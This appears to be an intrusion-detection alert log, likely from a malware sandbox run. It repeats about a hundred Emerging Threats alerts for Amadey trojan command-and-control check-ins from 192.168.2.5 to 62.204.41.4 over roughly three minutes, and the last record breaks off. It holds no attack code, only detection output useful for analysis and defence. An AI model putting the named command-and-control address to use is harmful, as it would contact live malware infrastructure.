ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.562.204.41.450046802027700 02/07/23-19:58:38.668972
SID:	2027700
Source Port:	50046
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.562.204.41.449873802027700 02/07/23-19:57:52.544613
SID:	2027700
Source Port:	49873
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.562.204.41.450415802027700 02/07/23-20:00:21.209012
SID:	2027700
Source Port:	50415
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.562.204.41.449795802027700 02/07/23-19:57:30.522001
SID:	2027700
Source Port:	49795
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.562.204.41.449878802027700 02/07/23-19:57:53.715011
SID:	2027700
Source Port:	49878
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.562.204.41.449837802027700 02/07/23-19:57:40.510394
SID:	2027700
Source Port:	49837
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.562.204.41.450165802027700 02/07/23-19:59:12.675415
SID:	2027700
Source Port:	50165
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.562.204.41.450378802027700 02/07/23-20:00:11.173249
SID:	2027700
Source Port:	50378
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.562.204.41.450124802027700 02/07/23-19:59:00.013175
SID:	2027700
Source Port:	50124
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.562.204.41.450337802027700 02/07/23-19:59:58.938844
SID:	2027700
Source Port:	50337
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.562.204.41.450207802027700 02/07/23-19:59:25.359503
SID:	2027700
Source Port:	50207
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.562.204.41.450341802027700 02/07/23-20:00:00.154878
SID:	2027700
Source Port:	50341
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.562.204.41.449722802027700 02/07/23-19:57:11.275289
SID:	2027700
Source Port:	49722
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.562.204.41.449976802027700 02/07/23-19:58:19.455952
SID:	2027700
Source Port:	49976
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.562.204.41.450436802027700 02/07/23-20:00:27.196537
SID:	2027700
Source Port:	50436
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.562.204.41.450430802027700 02/07/23-20:00:25.739838
SID:	2027700
Source Port:	50430
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.562.204.41.449719802027700 02/07/23-19:57:10.555436
SID:	2027700
Source Port:	49719
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.562.204.41.450338802027700 02/07/23-19:59:59.187277
SID:	2027700
Source Port:	50338
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.562.204.41.450427802027700 02/07/23-20:00:25.032850
SID:	2027700
Source Port:	50427
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.562.204.41.449808802027700 02/07/23-19:57:33.669443
SID:	2027700
Source Port:	49808
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.562.204.41.449906802027700 02/07/23-19:58:00.574287
SID:	2027700
Source Port:	49906
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.562.204.41.449817802027700 02/07/23-19:57:35.876380
SID:	2027700
Source Port:	49817
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.562.204.41.450329802027700 02/07/23-19:59:57.013885
SID:	2027700
Source Port:	50329
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.562.204.41.450074802027700 02/07/23-19:58:47.870199
SID:	2027700
Source Port:	50074
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.562.204.41.449915802027700 02/07/23-19:58:02.781708
SID:	2027700
Source Port:	49915
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.562.204.41.450172802027700 02/07/23-19:59:14.371003
SID:	2027700
Source Port:	50172
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.562.204.41.450013802027700 02/07/23-19:58:30.820175
SID:	2027700
Source Port:	50013
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.562.204.41.450270802027700 02/07/23-19:59:40.657861
SID:	2027700
Source Port:	50270
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.562.204.41.449948802027700 02/07/23-19:58:12.777625
SID:	2027700
Source Port:	49948
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.562.204.41.450083802027700 02/07/23-19:58:50.074970
SID:	2027700
Source Port:	50083
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.562.204.41.450402802027700 02/07/23-20:00:16.938938
SID:	2027700
Source Port:	50402
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.562.204.41.450169802027700 02/07/23-19:59:13.653163
SID:	2027700
Source Port:	50169
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.562.204.41.449750802027700 02/07/23-19:57:18.108794
SID:	2027700
Source Port:	49750
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.562.204.41.450267802027700 02/07/23-19:59:39.920444
SID:	2027700
Source Port:	50267
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.562.204.41.449741802027700 02/07/23-19:57:15.910290
SID:	2027700
Source Port:	49741
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.562.204.41.450178802027700 02/07/23-19:59:15.810186
SID:	2027700
Source Port:	50178
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.562.204.41.450109802027700 02/07/23-19:58:56.416170
SID:	2027700
Source Port:	50109
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.562.204.41.450103802027700 02/07/23-19:58:54.948416
SID:	2027700
Source Port:	50103
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.562.204.41.450268802027700 02/07/23-19:59:40.160557
SID:	2027700
Source Port:	50268
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.562.204.41.450357802027700 02/07/23-20:00:06.081116
SID:	2027700
Source Port:	50357
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.562.204.41.449779802027700 02/07/23-19:57:24.309471
SID:	2027700
Source Port:	49779
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.562.204.41.449934802027700 02/07/23-19:58:09.625815
SID:	2027700
Source Port:	49934
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.562.204.41.449738802027700 02/07/23-19:57:15.178369
SID:	2027700
Source Port:	49738
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.562.204.41.450014802027700 02/07/23-19:58:31.062717
SID:	2027700
Source Port:	50014
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.562.204.41.449975802027700 02/07/23-19:58:19.199653
SID:	2027700
Source Port:	49975
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.562.204.41.450210802027700 02/07/23-19:59:26.169613
SID:	2027700
Source Port:	50210
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.562.204.41.450411802027700 02/07/23-20:00:19.306270
SID:	2027700
Source Port:	50411
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.562.204.41.450464802027700 02/07/23-20:00:33.699108
SID:	2027700
Source Port:	50464
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.562.204.41.450055802027700 02/07/23-19:58:40.841197
SID:	2027700
Source Port:	50055
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.562.204.41.450144802027700 02/07/23-19:59:07.591286
SID:	2027700
Source Port:	50144
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.562.204.41.450181802027700 02/07/23-19:59:16.514939
SID:	2027700
Source Port:	50181
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.562.204.41.450340802027700 02/07/23-19:59:59.670957
SID:	2027700
Source Port:	50340
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.562.204.41.449721802027700 02/07/23-19:57:11.038423
SID:	2027700
Source Port:	49721
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.562.204.41.449886802027700 02/07/23-19:57:55.680683
SID:	2027700
Source Port:	49886
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.562.204.41.450398802027700 02/07/23-20:00:15.996201
SID:	2027700
Source Port:	50398
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.562.204.41.449845802027700 02/07/23-19:57:42.455705
SID:	2027700
Source Port:	49845
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.562.204.41.450251802027700 02/07/23-19:59:36.032976
SID:	2027700
Source Port:	50251
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.562.204.41.450197802027700 02/07/23-19:59:20.137780
SID:	2027700
Source Port:	50197
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.562.204.41.450239802027700 02/07/23-19:59:33.185655
SID:	2027700
Source Port:	50239
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.562.204.41.449811802027700 02/07/23-19:57:34.389822
SID:	2027700
Source Port:	49811
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.562.204.41.450379802027700 02/07/23-20:00:11.418266
SID:	2027700
Source Port:	50379
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.562.204.41.449947802027700 02/07/23-19:58:12.542504
SID:	2027700
Source Port:	49947
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.562.204.41.450214802027700 02/07/23-19:59:27.169597
SID:	2027700
Source Port:	50214
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.562.204.41.450128802027700 02/07/23-19:59:00.987231
SID:	2027700
Source Port:	50128
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.562.204.41.450312802027700 02/07/23-19:59:52.924013
SID:	2027700
Source Port:	50312
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.562.204.41.450468802027700 02/07/23-20:00:34.647098
SID:	2027700
Source Port:	50468
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.562.204.41.450125802027700 02/07/23-19:59:00.262200
SID:	2027700
Source Port:	50125
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.562.204.41.450223802027700 02/07/23-19:59:29.342199
SID:	2027700
Source Port:	50223
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.562.204.41.449864802027700 02/07/23-19:57:50.603717
SID:	2027700
Source Port:	49864
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.562.204.41.450131802027700 02/07/23-19:59:02.039230
SID:	2027700
Source Port:	50131
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.562.204.41.450385802027700 02/07/23-20:00:12.863067
SID:	2027700
Source Port:	50385
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.562.204.41.449766802027700 02/07/23-19:57:21.096100
SID:	2027700
Source Port:	49766
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.562.204.41.450070802027700 02/07/23-19:58:46.903603
SID:	2027700
Source Port:	50070
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.562.204.41.449849802027700 02/07/23-19:57:43.984219
SID:	2027700
Source Port:	49849
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.562.204.41.449775802027700 02/07/23-19:57:23.025798
SID:	2027700
Source Port:	49775
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.562.204.41.449858802027700 02/07/23-19:57:49.109185
SID:	2027700
Source Port:	49858
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.562.204.41.449794802027700 02/07/23-19:57:30.288757
SID:	2027700
Source Port:	49794
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.562.204.41.450140802027700 02/07/23-19:59:06.654084
SID:	2027700
Source Port:	50140
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.562.204.41.450394802027700 02/07/23-20:00:15.033222
SID:	2027700
Source Port:	50394
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.562.204.41.449791802027700 02/07/23-19:57:29.556151
SID:	2027700
Source Port:	49791
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.562.204.41.450042802027700 02/07/23-19:58:37.715383
SID:	2027700
Source Port:	50042
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.562.204.41.450296802027700 02/07/23-19:59:49.030441
SID:	2027700
Source Port:	50296
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.562.204.41.450039802027700 02/07/23-19:58:36.996099
SID:	2027700
Source Port:	50039
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.562.204.41.449922802027700 02/07/23-19:58:06.074309
SID:	2027700
Source Port:	49922
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.562.204.41.449880802027700 02/07/23-19:57:54.223863
SID:	2027700
Source Port:	49880
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.562.204.41.449931802027700 02/07/23-19:58:08.920914
SID:	2027700
Source Port:	49931
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.562.204.41.450455802027700 02/07/23-20:00:31.736851
SID:	2027700
Source Port:	50455
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.562.204.41.450201802027700 02/07/23-19:59:21.107449
SID:	2027700
Source Port:	50201
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.562.204.41.450325802027700 02/07/23-19:59:56.050545
SID:	2027700
Source Port:	50325
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.562.204.41.449836802027700 02/07/23-19:57:40.268244
SID:	2027700
Source Port:	49836
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.562.204.41.450366802027700 02/07/23-20:00:08.251401
SID:	2027700
Source Port:	50366
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.562.204.41.450449802027700 02/07/23-20:00:30.317849
SID:	2027700
Source Port:	50449
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.562.204.41.450242802027700 02/07/23-19:59:33.886857
SID:	2027700
Source Port:	50242
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.562.204.41.450414802027700 02/07/23-20:00:20.800586
SID:	2027700
Source Port:	50414
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.562.204.41.450112802027700 02/07/23-19:58:57.136239
SID:	2027700
Source Port:	50112
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.562.204.41.449877802027700 02/07/23-19:57:53.477790
SID:	2027700
Source Port:	49877
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.562.204.41.449706802027700 02/07/23-19:57:08.141498
SID:	2027700
Source Port:	49706
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.562.204.41.449919802027700 02/07/23-19:58:03.999927
SID:	2027700
Source Port:	49919
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.562.204.41.449747802027700 02/07/23-19:57:17.384762
SID:	2027700
Source Port:	49747
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.562.204.41.449788802027700 02/07/23-19:57:28.836185
SID:	2027700
Source Port:	49788
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.562.204.41.450099802027700 02/07/23-19:58:53.985606
SID:	2027700
Source Port:	50099
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.562.204.41.450283802027700 02/07/23-19:59:45.895142
SID:	2027700
Source Port:	50283
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.562.204.41.450153802027700 02/07/23-19:59:09.775607
SID:	2027700
Source Port:	50153
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.562.204.41.450194802027700 02/07/23-19:59:19.434056
SID:	2027700
Source Port:	50194
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.562.204.41.450408802027700 02/07/23-20:00:18.376566
SID:	2027700
Source Port:	50408
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.562.204.41.449861802027700 02/07/23-19:57:49.861421
